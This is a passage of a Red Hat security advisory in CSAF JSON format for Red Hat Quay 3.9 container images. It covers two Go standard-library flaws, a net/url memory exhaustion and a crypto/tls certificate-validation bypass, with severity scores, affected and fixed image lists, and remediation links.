"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"relates_to_product_reference": "Red Hat Quay 3.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64 as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64",
"relates_to_product_reference": "Red Hat Quay 3.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"relates_to_product_reference": "Red Hat Quay 3.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64 as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64",
"relates_to_product_reference": "Red Hat Quay 3.9"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-19T19:18:06+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5168"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2025-68121",
"discovery_date": "2026-02-05T18:01:30.086058+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437111"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is a moderate flaw because it only occurs under specific conditions, such as TLS session resumption with runtime changes to certificate authority settings. Exploitation is not straightforward and requires a controlled setup. The impact is limited to certificate validation within the same component and does not affect system availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
